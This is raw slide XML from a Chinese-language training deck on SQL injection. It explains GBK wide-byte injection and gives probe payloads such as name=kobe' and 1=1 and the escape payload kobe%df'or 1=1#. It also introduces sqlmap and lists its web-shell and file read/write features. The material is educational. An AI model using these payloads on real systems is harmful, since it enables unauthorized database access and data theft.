                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将单引号变为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>\'，其中\的十六进制是%5c,mysql的GBK编码，会认为%df%5c是一个宽字节，也就是'運'，从而使单引号闭合（逃逸），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行注入攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://www.nicai.com/index.php?id=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当提交 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?id=1' and 1=1%23 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>运行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select * from user where id ='1\' and 1=1#’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>很明显这是没有注入成功的，而当我们提交 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>id=1%df' and 1=1%23 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>运行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句就变为了</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select * from user where id ='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>運</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>' and 1=1#’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>逃逸成功！！！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>我们这里的宽字节注入是利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的一个特性，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GBK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编码的时候，由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GBK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是多字节编码，会认为两个字节代表一个汉字（前一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>码要大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>128</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，才到汉字的范围），所以％</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和后面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>也就是％</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中变成了一个汉字“運”，从而使单引号逃逸了出来。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F1FFD22-72C6-F1E0-614D-76D77350FA25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="400308"/>
            <a:ext cx="832787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宽字节注入</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XXE</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>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SQL</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>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122922179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7872919" cy="7848302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>判断注入点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>kobe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>kobe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>kobe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> and 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>kobe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> and 1=2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>以上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在发送之后，我们发现页面返回的信息都是相同的，没有发生变化。此时我们就应该想到，很有可能是我们的单</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>双</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>引号被转义了，那么此时我们就应该进行逃逸。</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构建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pyload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>kobe%df’or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 1=1#</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F1FFD22-72C6-F1E0-614D-76D77350FA25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="400308"/>
            <a:ext cx="832787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宽字节注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F14AE47-0D25-5950-2721-384561C5738D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11400918" y="2472693"/>
            <a:ext cx="11731457" cy="9307932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308471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4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6334125" y="6569987"/>
            <a:ext cx="11715750" cy="554870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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9263062" y="5286375"/>
            <a:ext cx="5857875" cy="3143250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6600825" y="10181945"/>
            <a:ext cx="11182350" cy="34467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p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>https://github.com/sqlmapproject/sqlmap</a:t>
            </a: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p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.........................</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EBE192F-F709-67C6-7985-F5499EA254C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="400308"/>
            <a:ext cx="586246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注入检测工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16433354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p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>多种注入策略：Normal,      Error, Blind 和      Time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>多种注入结构：Standard,      Zipped, Dump In One Shot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL Engine用于研究和优化SQL表达式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入多个目标</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>搜索管理页面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web shell和SQL      shell的创建和虚拟化</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用注入在主机上读写文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
